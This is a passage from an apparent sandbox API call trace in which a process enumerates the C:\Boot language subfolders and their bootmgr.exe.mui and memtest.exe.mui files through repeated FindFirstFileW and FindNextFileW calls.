ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.664] FindNextFileW (in: hFindFile=0x604778, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.664] FindNextFileW (in: hFindFile=0x604778, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.664] FindClose (in: hFindFile=0x604778 | out: hFindFile=0x604778) returned 1 [0197.665] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.665] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0197.665] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0197.665] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.665] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.666] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.666] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.666] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0197.666] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.666] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0197.666] FindFirstFileW (in: lpFileName="C:\\Boot\\sk-SK\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6042f8 [0197.666] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.666] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.666] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.666] FindClose (in: hFindFile=0x6042f8 | out: hFindFile=0x6042f8) returned 1 [0197.666] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.667] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0197.667] FindFirstFileW (in: lpFileName="C:\\Boot\\sl-SI\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604738 [0197.667] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.667] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.667] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.668] FindClose (in: hFindFile=0x604738 | out: hFindFile=0x604738) returned 1 [0197.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.668] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0197.668] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604378 [0197.668] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.668] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.668] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.668] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.669] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0197.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.669] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0197.669] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0197.670] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.670] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.670] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.670] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0197.670] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.670] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0197.670] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604378 [0197.671] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.671] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.671] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.671] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.671] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0197.671] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.671] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0197.671] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0197.671] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.672] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.672] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.672] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.672] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0197.672] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.672] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0197.672] FindFirstFileW (in: lpFileName="C:\\Boot\\uk-UA\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043f8 [0197.673] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, 